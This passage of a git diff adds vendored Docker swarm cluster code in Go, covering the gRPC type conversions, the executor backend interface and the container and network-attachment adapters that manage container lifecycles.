+		}
+	}
+	return reqs
+}
+
+func restartPolicyFromGRPC(p *swarmapi.RestartPolicy) *types.RestartPolicy {
+	var rp *types.RestartPolicy
+	if p != nil {
+		rp = &types.RestartPolicy{}
+
+		switch p.Condition {
+		case swarmapi.RestartOnNone:
+			rp.Condition = types.RestartPolicyConditionNone
+		case swarmapi.RestartOnFailure:
+			rp.Condition = types.RestartPolicyConditionOnFailure
+		case swarmapi.RestartOnAny:
+			rp.Condition = types.RestartPolicyConditionAny
+		default:
+			rp.Condition = types.RestartPolicyConditionAny
+		}
+
+		if p.Delay != nil {
+			delay, _ := ptypes.Duration(p.Delay)
+			rp.Delay = &delay
+		}
+		if p.Window != nil {
+			window, _ := ptypes.Duration(p.Window)
+			rp.Window = &window
+		}
+
+		rp.MaxAttempts = &p.MaxAttempts
+	}
+	return rp
+}
+
+func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error) {
+	var rp *swarmapi.RestartPolicy
+	if p != nil {
+		rp = &swarmapi.RestartPolicy{}
+
+		switch p.Condition {
+		case types.RestartPolicyConditionNone:
+			rp.Condition = swarmapi.RestartOnNone
+		case types.RestartPolicyConditionOnFailure:
+			rp.Condition = swarmapi.RestartOnFailure
+		case types.RestartPolicyConditionAny:
+			rp.Condition = swarmapi.RestartOnAny
+		default:
+			if string(p.Condition) != "" {
+				return nil, fmt.Errorf("invalid RestartCondition: %q", p.Condition)
+			}
+			rp.Condition = swarmapi.RestartOnAny
+		}
+
+		if p.Delay != nil {
+			rp.Delay = ptypes.DurationProto(*p.Delay)
+		}
+		if p.Window != nil {
+			rp.Window = ptypes.DurationProto(*p.Window)
+		}
+		if p.MaxAttempts != nil {
+			rp.MaxAttempts = *p.MaxAttempts
+
+		}
+	}
+	return rp, nil
+}
+
+func placementFromGRPC(p *swarmapi.Placement) *types.Placement {
+	var r *types.Placement
+	if p != nil {
+		r = &types.Placement{}
+		r.Constraints = p.Constraints
+	}
+
+	return r
+}
+
+func driverFromGRPC(p *swarmapi.Driver) *types.Driver {
+	if p == nil {
+		return nil
+	}
+
+	return &types.Driver{
+		Name:    p.Name,
+		Options: p.Options,
+	}
+}
+
+func driverToGRPC(p *types.Driver) *swarmapi.Driver {
+	if p == nil {
+		return nil
+	}
+
+	return &swarmapi.Driver{
+		Name:    p.Name,
+		Options: p.Options,
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go
new file mode 100644
index 0000000000..606e00a69b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go
@@ -0,0 +1,122 @@
+package convert
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	types "github.com/docker/docker/api/types/swarm"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+)
+
+// SwarmFromGRPC converts a grpc Cluster to a Swarm.
+func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm {
+	swarm := types.Swarm{
+		ClusterInfo: types.ClusterInfo{
+			ID: c.ID,
+			Spec: types.Spec{
+				Orchestration: types.OrchestrationConfig{
+					TaskHistoryRetentionLimit: &c.Spec.Orchestration.TaskHistoryRetentionLimit,
+				},
+				Raft: types.RaftConfig{
+					SnapshotInterval:           c.Spec.Raft.SnapshotInterval,
+					KeepOldSnapshots:           &c.Spec.Raft.KeepOldSnapshots,
+					LogEntriesForSlowFollowers: c.Spec.Raft.LogEntriesForSlowFollowers,
+					HeartbeatTick:              int(c.Spec.Raft.HeartbeatTick),
+					ElectionTick:               int(c.Spec.Raft.ElectionTick),
+				},
+				EncryptionConfig: types.EncryptionConfig{
+					AutoLockManagers: c.Spec.EncryptionConfig.AutoLockManagers,
+				},
+			},
+		},
+		JoinTokens: types.JoinTokens{
+			Worker:  c.RootCA.JoinTokens.Worker,
+			Manager: c.RootCA.JoinTokens.Manager,
+		},
+	}
+
+	heartbeatPeriod, _ := ptypes.Duration(c.Spec.Dispatcher.HeartbeatPeriod)
+	swarm.Spec.Dispatcher.HeartbeatPeriod = heartbeatPeriod
+
+	swarm.Spec.CAConfig.NodeCertExpiry, _ = ptypes.Duration(c.Spec.CAConfig.NodeCertExpiry)
+
+	for _, ca := range c.Spec.CAConfig.ExternalCAs {
+		swarm.Spec.CAConfig.ExternalCAs = append(swarm.Spec.CAConfig.ExternalCAs, &types.ExternalCA{
+			Protocol: types.ExternalCAProtocol(strings.ToLower(ca.Protocol.String())),
+			URL:      ca.URL,
+			Options:  ca.Options,
+		})
+	}
+
+	// Meta
+	swarm.Version.Index = c.Meta.Version.Index
+	swarm.CreatedAt, _ = ptypes.Timestamp(c.Meta.CreatedAt)
+	swarm.UpdatedAt, _ = ptypes.Timestamp(c.Meta.UpdatedAt)
+
+	// Annotations
+	swarm.Spec.Name = c.Spec.Annotations.Name
+	swarm.Spec.Labels = c.Spec.Annotations.Labels
+
+	return swarm
+}
+
+// SwarmSpecToGRPC converts a Spec to a grpc ClusterSpec.
+func SwarmSpecToGRPC(s types.Spec) (swarmapi.ClusterSpec, error) {
+	return MergeSwarmSpecToGRPC(s, swarmapi.ClusterSpec{})
+}
+
+// MergeSwarmSpecToGRPC merges a Spec with an initial grpc ClusterSpec
+func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.ClusterSpec, error) {
+	// We take the initSpec (either created from scratch, or returned by swarmkit),
+	// and will only change the value if the one taken from types.Spec is not nil or 0.
+	// In other words, if the value taken from types.Spec is nil or 0, we will maintain the status quo.
+	if s.Annotations.Name != "" {
+		spec.Annotations.Name = s.Annotations.Name
+	}
+	if len(s.Annotations.Labels) != 0 {
+		spec.Annotations.Labels = s.Annotations.Labels
+	}
+
+	if s.Orchestration.TaskHistoryRetentionLimit != nil {
+		spec.Orchestration.TaskHistoryRetentionLimit = *s.Orchestration.TaskHistoryRetentionLimit
+	}
+	if s.Raft.SnapshotInterval != 0 {
+		spec.Raft.SnapshotInterval = s.Raft.SnapshotInterval
+	}
+	if s.Raft.KeepOldSnapshots != nil {
+		spec.Raft.KeepOldSnapshots = *s.Raft.KeepOldSnapshots
+	}
+	if s.Raft.LogEntriesForSlowFollowers != 0 {
+		spec.Raft.LogEntriesForSlowFollowers = s.Raft.LogEntriesForSlowFollowers
+	}
+	if s.Raft.HeartbeatTick != 0 {
+		spec.Raft.HeartbeatTick = uint32(s.Raft.HeartbeatTick)
+	}
+	if s.Raft.ElectionTick != 0 {
+		spec.Raft.ElectionTick = uint32(s.Raft.ElectionTick)
+	}
+	if s.Dispatcher.HeartbeatPeriod != 0 {
+		spec.Dispatcher.HeartbeatPeriod = ptypes.DurationProto(time.Duration(s.Dispatcher.HeartbeatPeriod))
+	}
+	if s.CAConfig.NodeCertExpiry != 0 {
+		spec.CAConfig.NodeCertExpiry = ptypes.DurationProto(s.CAConfig.NodeCertExpiry)
+	}
+
+	for _, ca := range s.CAConfig.ExternalCAs {
+		protocol, ok := swarmapi.ExternalCA_CAProtocol_value[strings.ToUpper(string(ca.Protocol))]
+		if !ok {
+			return swarmapi.ClusterSpec{}, fmt.Errorf("invalid protocol: %q", ca.Protocol)
+		}
+		spec.CAConfig.ExternalCAs = append(spec.CAConfig.ExternalCAs, &swarmapi.ExternalCA{
+			Protocol: swarmapi.ExternalCA_CAProtocol(protocol),
+			URL:      ca.URL,
+			Options:  ca.Options,
+		})
+	}
+
+	spec.EncryptionConfig.AutoLockManagers = s.EncryptionConfig.AutoLockManagers
+
+	return spec, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go
new file mode 100644
index 0000000000..d0cf89c288
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go
@@ -0,0 +1,81 @@
+package convert
+
+import (
+	"strings"
+
+	types "github.com/docker/docker/api/types/swarm"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+)
+
+// TaskFromGRPC converts a grpc Task to a Task.
+func TaskFromGRPC(t swarmapi.Task) types.Task {
+	if t.Spec.GetAttachment() != nil {
+		return types.Task{}
+	}
+	containerConfig := t.Spec.Runtime.(*swarmapi.TaskSpec_Container).Container
+	containerStatus := t.Status.GetContainer()
+	networks := make([]types.NetworkAttachmentConfig, 0, len(t.Spec.Networks))
+	for _, n := range t.Spec.Networks {
+		networks = append(networks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+	}
+
+	task := types.Task{
+		ID: t.ID,
+		Annotations: types.Annotations{
+			Name:   t.Annotations.Name,
+			Labels: t.Annotations.Labels,
+		},
+		ServiceID: t.ServiceID,
+		Slot:      int(t.Slot),
+		NodeID:    t.NodeID,
+		Spec: types.TaskSpec{
+			ContainerSpec: containerSpecFromGRPC(containerConfig),
+			Resources:     resourcesFromGRPC(t.Spec.Resources),
+			RestartPolicy: restartPolicyFromGRPC(t.Spec.Restart),
+			Placement:     placementFromGRPC(t.Spec.Placement),
+			LogDriver:     driverFromGRPC(t.Spec.LogDriver),
+			Networks:      networks,
+		},
+		Status: types.TaskStatus{
+			State:   types.TaskState(strings.ToLower(t.Status.State.String())),
+			Message: t.Status.Message,
+			Err:     t.Status.Err,
+		},
+		DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())),
+	}
+
+	// Meta
+	task.Version.Index = t.Meta.Version.Index
+	task.CreatedAt, _ = ptypes.Timestamp(t.Meta.CreatedAt)
+	task.UpdatedAt, _ = ptypes.Timestamp(t.Meta.UpdatedAt)
+
+	task.Status.Timestamp, _ = ptypes.Timestamp(t.Status.Timestamp)
+
+	if containerStatus != nil {
+		task.Status.ContainerStatus.ContainerID = containerStatus.ContainerID
+		task.Status.ContainerStatus.PID = int(containerStatus.PID)
+		task.Status.ContainerStatus.ExitCode = int(containerStatus.ExitCode)
+	}
+
+	// NetworksAttachments
+	for _, na := range t.Networks {
+		task.NetworksAttachments = append(task.NetworksAttachments, networkAttachementFromGRPC(na))
+	}
+
+	if t.Status.PortStatus == nil {
+		return task
+	}
+
+	for _, p := range t.Status.PortStatus.Ports {
+		task.Status.PortStatus.Ports = append(task.Status.PortStatus.Ports, types.PortConfig{
+			Name:          p.Name,
+			Protocol:      types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(p.Protocol)])),
+			PublishMode:   types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(p.PublishMode)])),
+			TargetPort:    p.TargetPort,
+			PublishedPort: p.PublishedPort,
+		})
+	}
+
+	return task
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go
new file mode 100644
index 0000000000..0f1da38558
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go
@@ -0,0 +1,61 @@
+package executor
+
+import (
+	"io"
+	"time"
+
+	"github.com/docker/distribution"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/network"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	clustertypes "github.com/docker/docker/daemon/cluster/provider"
+	"github.com/docker/docker/plugin"
+	"github.com/docker/docker/reference"
+	"github.com/docker/libnetwork"
+	"github.com/docker/libnetwork/cluster"
+	networktypes "github.com/docker/libnetwork/types"
+	"github.com/docker/swarmkit/agent/exec"
+	"golang.org/x/net/context"
+)
+
+// Backend defines the executor component for a swarm agent.
+type Backend interface {
+	CreateManagedNetwork(clustertypes.NetworkCreateRequest) error
+	DeleteManagedNetwork(name string) error
+	FindNetwork(idName string) (libnetwork.Network, error)
+	SetupIngress(req clustertypes.NetworkCreateRequest, nodeIP string) error
+	PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
+	CreateManagedContainer(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error)
+	ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error
+	ContainerStop(name string, seconds *int) error
+	ContainerLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error
+	ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error
+	ActivateContainerServiceBinding(containerName string) error
+	DeactivateContainerServiceBinding(containerName string) error
+	UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error
+	ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error)
+	ContainerWaitWithContext(ctx context.Context, name string) error
+	ContainerRm(name string, config *types.ContainerRmConfig) error
+	ContainerKill(name string, sig uint64) error
+	SetContainerSecretStore(name string, store exec.SecretGetter) error
+	SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error
+	SystemInfo() (*types.Info, error)
+	VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error)
+	Containers(config *types.ContainerListOptions) ([]*types.Container, error)
+	SetNetworkBootstrapKeys([]*networktypes.EncryptionKey) error
+	DaemonJoinsCluster(provider cluster.Provider)
+	DaemonLeavesCluster()
+	IsSwarmCompatible() error
+	SubscribeToEvents(since, until time.Time, filter filters.Args) ([]events.Message, chan interface{})
+	UnsubscribeFromEvents(listener chan interface{})
+	UpdateAttachment(string, string, string, *network.NetworkingConfig) error
+	WaitForDetachment(context.Context, string, string, string, string) error
+	GetRepository(context.Context, reference.NamedTagged, *types.AuthConfig) (distribution.Repository, bool, error)
+	LookupImage(name string) (*types.ImageInspect, error)
+	PluginManager() *plugin.Manager
+	PluginGetter() *plugin.Store
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go
new file mode 100644
index 0000000000..f82f8b54d3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go
@@ -0,0 +1,463 @@
+package container
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/daemon/cluster/convert"
+	executorpkg "github.com/docker/docker/daemon/cluster/executor"
+	"github.com/docker/docker/reference"
+	"github.com/docker/libnetwork"
+	"github.com/docker/swarmkit/agent/exec"
+	"github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/log"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+	"golang.org/x/net/context"
+	"golang.org/x/time/rate"
+)
+
+// containerAdapter conducts remote operations for a container. All calls
+// are mostly naked calls to the client API, seeded with information from
+// containerConfig.
+type containerAdapter struct {
+	backend   executorpkg.Backend
+	container *containerConfig
+	secrets   exec.SecretGetter
+}
+
+func newContainerAdapter(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*containerAdapter, error) {
+	ctnr, err := newContainerConfig(task)
+	if err != nil {
+		return nil, err
+	}
+
+	return &containerAdapter{
+		container: ctnr,
+		backend:   b,
+		secrets:   secrets,
+	}, nil
+}
+
+func (c *containerAdapter) pullImage(ctx context.Context) error {
+	spec := c.container.spec()
+
+	// Skip pulling if the image is referenced by image ID.
+	if _, err := digest.ParseDigest(spec.Image); err == nil {
+		return nil
+	}
+
+	// Skip pulling if the image is referenced by digest and already
+	// exists locally.
+	named, err := reference.ParseNamed(spec.Image)
+	if err == nil {
+		if _, ok := named.(reference.Canonical); ok {
+			_, err := c.backend.LookupImage(spec.Image)
+			if err == nil {
+				return nil
+			}
+		}
+	}
+
+	// if the image needs to be pulled, the auth config will be retrieved and updated
+	var encodedAuthConfig string
+	if spec.PullOptions != nil {
+		encodedAuthConfig = spec.PullOptions.RegistryAuth
+	}
+
+	authConfig := &types.AuthConfig{}
+	if encodedAuthConfig != "" {
+		if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuthConfig))).Decode(authConfig); err != nil {
+			logrus.Warnf("invalid authconfig: %v", err)
+		}
+	}
+
+	pr, pw := io.Pipe()
+	metaHeaders := map[string][]string{}
+	go func() {
+		err := c.backend.PullImage(ctx, c.container.image(), "", metaHeaders, authConfig, pw)
+		pw.CloseWithError(err)
+	}()
+
+	dec := json.NewDecoder(pr)
+	dec.UseNumber()
+	m := map[string]interface{}{}
+	spamLimiter := rate.NewLimiter(rate.Every(time.Second), 1)
+
+	lastStatus := ""
+	for {
+		if err := dec.Decode(&m); err != nil {
+			if err == io.EOF {
+				break
+			}
+			return err
+		}
+		l := log.G(ctx)
+		// limit pull progress logs unless the status changes
+		if spamLimiter.Allow() || lastStatus != m["status"] {
+			// if we have progress details, we have everything we need
+			if progress, ok := m["progressDetail"].(map[string]interface{}); ok {
+				// first, log the image and status
+				l = l.WithFields(logrus.Fields{
+					"image":  c.container.image(),
+					"status": m["status"],
+				})
+				// then, if we have progress, log the progress
+				if progress["current"] != nil && progress["total"] != nil {
+					l = l.WithFields(logrus.Fields{
+						"current": progress["current"],
+						"total":   progress["total"],
+					})
+				}
+			}
+			l.Debug("pull in progress")
+		}
+		// sometimes, we get no useful information at all, and add no fields
+		if status, ok := m["status"].(string); ok {
+			lastStatus = status
+		}
+	}
+
+	// if the final stream object contained an error, return it
+	if errMsg, ok := m["error"]; ok {
+		return fmt.Errorf("%v", errMsg)
+	}
+	return nil
+}
+
+func (c *containerAdapter) createNetworks(ctx context.Context) error {
+	for _, network := range c.container.networks() {
+		ncr, err := c.container.networkCreateRequest(network)
+		if err != nil {
+			return err
+		}
+
+		if err := c.backend.CreateManagedNetwork(ncr); err != nil { // todo name missing
+			if _, ok := err.(libnetwork.NetworkNameError); ok {
+				continue
+			}
+
+			return err
+		}
+	}
+
+	return nil
+}
+
+func (c *containerAdapter) removeNetworks(ctx context.Context) error {
+	for _, nid := range c.container.networks() {
+		if err := c.backend.DeleteManagedNetwork(nid); err != nil {
+			switch err.(type) {
+			case *libnetwork.ActiveEndpointsError:
+				continue
+			case libnetwork.ErrNoSuchNetwork:
+				continue
+			default:
+				log.G(ctx).Errorf("network %s remove failed: %v", nid, err)
+				return err
+			}
+		}
+	}
+
+	return nil
+}
+
+func (c *containerAdapter) networkAttach(ctx context.Context) error {
+	config := c.container.createNetworkingConfig()
+
+	var (
+		networkName string
+		networkID   string
+	)
+
+	if config != nil {
+		for n, epConfig := range config.EndpointsConfig {
+			networkName = n
+			networkID = epConfig.NetworkID
+			break
+		}
+	}
+
+	return c.backend.UpdateAttachment(networkName, networkID, c.container.id(), config)
+}
+
+func (c *containerAdapter) waitForDetach(ctx context.Context) error {
+	config := c.container.createNetworkingConfig()
+
+	var (
+		networkName string
+		networkID   string
+	)
+
+	if config != nil {
+		for n, epConfig := range config.EndpointsConfig {
+			networkName = n
+			networkID = epConfig.NetworkID
+			break
+		}
+	}
+
+	return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.id())
+}
+
+func (c *containerAdapter) create(ctx context.Context) error {
+	var cr containertypes.ContainerCreateCreatedBody
+	var err error
+
+	if cr, err = c.backend.CreateManagedContainer(types.ContainerCreateConfig{
+		Name:       c.container.name(),
+		Config:     c.container.config(),
+		HostConfig: c.container.hostConfig(),
+		// Use the first network in container create
+		NetworkingConfig: c.container.createNetworkingConfig(),
+	}); err != nil {
+		return err
+	}
+
+	// Docker daemon currently doesn't support multiple networks in container create
+	// Connect to all other networks
+	nc := c.container.connectNetworkingConfig()
+
+	if nc != nil {
+		for n, ep := range nc.EndpointsConfig {
+			if err := c.backend.ConnectContainerToNetwork(cr.ID, n, ep); err != nil {
+				return err
+			}
+		}
+	}
+
+	container := c.container.task.Spec.GetContainer()
+	if container == nil {
+		return fmt.Errorf("unable to get container from task spec")
+	}
+
+	// configure secrets
+	if err := c.backend.SetContainerSecretStore(cr.ID, c.secrets); err != nil {
+		return err
+	}
+
+	refs := convert.SecretReferencesFromGRPC(container.Secrets)
+	if err := c.backend.SetContainerSecretReferences(cr.ID, refs); err != nil {
+		return err
+	}
+
+	if err := c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// checkMounts ensures that the provided mounts won't have any host-specific
+// problems at start up. For example, we disallow bind mounts without an
+// existing path, which slightly different from the container API.
+func (c *containerAdapter) checkMounts() error {
+	spec := c.container.spec()
+	for _, mount := range spec.Mounts {
+		switch mount.Type {
+		case api.MountTypeBind:
+			if _, err := os.Stat(mount.Source); os.IsNotExist(err) {
+				return fmt.Errorf("invalid bind mount source, source path not found: %s", mount.Source)
+			}
+		}
+	}
+
+	return nil
+}
+
+func (c *containerAdapter) start(ctx context.Context) error {
+	if err := c.checkMounts(); err != nil {
+		return err
+	}
+
+	return c.backend.ContainerStart(c.container.name(), nil, "", "")
+}
+
+func (c *containerAdapter) inspect(ctx context.Context) (types.ContainerJSON, error) {
+	cs, err := c.backend.ContainerInspectCurrent(c.container.name(), false)
+	if ctx.Err() != nil {
+		return types.ContainerJSON{}, ctx.Err()
+	}
+	if err != nil {
+		return types.ContainerJSON{}, err
+	}
+	return *cs, nil
+}
+
+// events issues a call to the events API and returns a channel with all
+// events. The stream of events can be shutdown by cancelling the context.
+func (c *containerAdapter) events(ctx context.Context) <-chan events.Message {
+	log.G(ctx).Debugf("waiting on events")
+	buffer, l := c.backend.SubscribeToEvents(time.Time{}, time.Time{}, c.container.eventFilter())
+	eventsq := make(chan events.Message, len(buffer))
+
+	for _, event := range buffer {
+		eventsq <- event
+	}
+
+	go func() {
+		defer c.backend.UnsubscribeFromEvents(l)
+
+		for {
+			select {
+			case ev := <-l:
+				jev, ok := ev.(events.Message)
+				if !ok {
+					log.G(ctx).Warnf("unexpected event message: %q", ev)
+					continue
+				}
+				select {
+				case eventsq <- jev:
+				case <-ctx.Done():
+					return
+				}
+			case <-ctx.Done():
+				return
+			}
+		}
+	}()
+
+	return eventsq
+}
+
+func (c *containerAdapter) wait(ctx context.Context) error {
+	return c.backend.ContainerWaitWithContext(ctx, c.container.nameOrID())
+}
+
+func (c *containerAdapter) shutdown(ctx context.Context) error {
+	// Default stop grace period to nil (daemon will use the stopTimeout of the container)
+	var stopgrace *int
+	spec := c.container.spec()
+	if spec.StopGracePeriod != nil {
+		stopgraceValue := int(spec.StopGracePeriod.Seconds)
+		stopgrace = &stopgraceValue
+	}
+	return c.backend.ContainerStop(c.container.name(), stopgrace)
+}
+
+func (c *containerAdapter) terminate(ctx context.Context) error {
+	return c.backend.ContainerKill(c.container.name(), uint64(syscall.SIGKILL))
+}
+
+func (c *containerAdapter) remove(ctx context.Context) error {
+	return c.backend.ContainerRm(c.container.name(), &types.ContainerRmConfig{
+		RemoveVolume: true,
+		ForceRemove:  true,
+	})
+}
+
+func (c *containerAdapter) createVolumes(ctx context.Context) error {
+	// Create plugin volumes that are embedded inside a Mount
+	for _, mount := range c.container.task.Spec.GetContainer().Mounts {
+		if mount.Type != api.MountTypeVolume {
+			continue
+		}
+
+		if mount.VolumeOptions == nil {
+			continue
+		}
+
+		if mount.VolumeOptions.DriverConfig == nil {
+			continue
+		}
+
+		req := c.container.volumeCreateRequest(&mount)
+
+		// Check if this volume exists on the engine
+		if _, err := c.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels); err != nil {
+			// TODO(amitshukla): Today, volume create through the engine api does not return an error
+			// when the named volume with the same parameters already exists.
+			// It returns an error if the driver name is different - that is a valid error
+			return err
+		}
+
+	}
+
+	return nil
+}
+
+func (c *containerAdapter) activateServiceBinding() error {
+	return c.backend.ActivateContainerServiceBinding(c.container.name())
+}
+
+func (c *containerAdapter) deactivateServiceBinding() error {
+	return c.backend.DeactivateContainerServiceBinding(c.container.name())
+}
+
+func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (io.ReadCloser, error) {
+	reader, writer := io.Pipe()
+
+	apiOptions := &backend.ContainerLogsConfig{
+		ContainerLogsOptions: types.ContainerLogsOptions{
+			Follow: options.Follow,
+
+			// TODO(stevvooe): Parse timestamp out of message. This
+			// absolutely needs to be done before going to production with
+			// this, at it is completely redundant.
+			Timestamps: true,
+			Details:    false, // no clue what to do with this, let's just deprecate it.
+		},
+		OutStream: writer,
+	}
+
+	if options.Since != nil {
+		since, err := ptypes.Timestamp(options.Since)
+		if err != nil {
+			return nil, err
+		}
+		apiOptions.Since = since.Format(time.RFC3339Nano)
+	}
+
+	if options.Tail < 0 {
+		// See protobuf documentation for details of how this works.
+		apiOptions.Tail = fmt.Sprint(-options.Tail - 1)
+	} else if options.Tail > 0 {
+		return nil, fmt.Errorf("tail relative to start of logs not supported via docker API")
+	}
+
+	if len(options.Streams) == 0 {
+		// empty == all
+		apiOptions.ShowStdout, apiOptions.ShowStderr = true, true
+	} else {
+		for _, stream := range options.Streams {
+			switch stream {
+			case api.LogStreamStdout:
+				apiOptions.ShowStdout = true
+			case api.LogStreamStderr:
+				apiOptions.ShowStderr = true
+			}
+		}
+	}
+
+	chStarted := make(chan struct{})
+	go func() {
+		defer writer.Close()
+		c.backend.ContainerLogs(ctx, c.container.name(), apiOptions, chStarted)
+	}()
+
+	return reader, nil
+}
+
+// todo: typed/wrapped errors
+func isContainerCreateNameConflict(err error) bool {
+	return strings.Contains(err.Error(), "Conflict. The name")
+}
+
+func isUnknownContainer(err error) bool {
+	return strings.Contains(err.Error(), "No such container:")
+}
+
+func isStoppedContainer(err error) bool {
+	return strings.Contains(err.Error(), "is already stopped")
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go
new file mode 100644
index 0000000000..e0ee81a8b9
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go
@@ -0,0 +1,81 @@
+package container
+
+import (
+	executorpkg "github.com/docker/docker/daemon/cluster/executor"
+	"github.com/docker/swarmkit/agent/exec"
+	"github.com/docker/swarmkit/api"
+	"golang.org/x/net/context"
+)
+
+// networkAttacherController implements agent.Controller against docker's API.
+//
+// networkAttacherController manages the lifecycle of network
+// attachment of a docker unmanaged container managed as a task from
+// agent point of view. It provides network attachment information to
+// the unmanaged container for it to attach to the network and run.
+type networkAttacherController struct {
+	backend executorpkg.Backend
+	task    *api.Task
+	adapter *containerAdapter
+	closed  chan struct{}
+}
+
+func newNetworkAttacherController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*networkAttacherController, error) {
+	adapter, err := newContainerAdapter(b, task, secrets)
+	if err != nil {
+		return nil, err
+	}
+
+	return &networkAttacherController{
+		backend: b,
+		task:    task,
+		adapter: adapter,
+		closed:  make(chan struct{}),
+	}, nil
+}
+
+func (nc *networkAttacherController) Update(ctx context.Context, t *api.Task) error {
+	return nil
+}
+
+func (nc *networkAttacherController) Prepare(ctx context.Context) error {
+	// Make sure all the networks that the task needs are created.
+	if err := nc.adapter.createNetworks(ctx); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func (nc *networkAttacherController) Start(ctx context.Context) error {
+	return nc.adapter.networkAttach(ctx)
+}
+
+func (nc *networkAttacherController) Wait(pctx context.Context) error {
+	ctx, cancel := context.WithCancel(pctx)
+	defer cancel()
+
+	return nc.adapter.waitForDetach(ctx)
+}
+
+func (nc *networkAttacherController) Shutdown(ctx context.Context) error {
+	return nil
+}
+
+func (nc *networkAttacherController) Terminate(ctx context.Context) error {
+	return nil
+}
+
+func (nc *networkAttacherController) Remove(ctx context.Context) error {
+	// Try removing the network referenced in this task in case this
+	// task is the last one referencing it
+	if err := nc.adapter.removeNetworks(ctx); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func (nc *networkAttacherController) Close() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go
new file mode 100644
index 0000000000..f033ad545e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go
@@ -0,0 +1,598 @@
+package container
+
+import (
+	"errors"
+	"fmt"
+	"net"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+
+	"github.com/docker/docker/api/types"
+	enginecontainer "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	enginemount "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/network"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	clustertypes "github.com/docker/docker/daemon/cluster/provider"
+	"github.com/docker/docker/reference"
+	"github.com/docker/go-connections/nat"
+	"github.com/docker/swarmkit/agent/exec"
+	"github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+	"github.com/docker/swarmkit/template"
+)
+
+const (
+	// Explicitly use the kernel's default setting for CPU quota of 100ms.
+	// https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt
+	cpuQuotaPeriod = 100 * time.Millisecond
+
+	// systemLabelPrefix represents the reserved namespace for system labels.
+	systemLabelPrefix = "com.docker.swarm"
+)
+
+// containerConfig converts task properties into docker container compatible
+// components.
+type containerConfig struct {
+	task                *api.Task
+	networksAttachments map[string]*api.NetworkAttachment
+}
+
+// newContainerConfig returns a validated container config. No methods should
+// return an error if this function returns without error.
+func newContainerConfig(t *api.Task) (*containerConfig, error) {
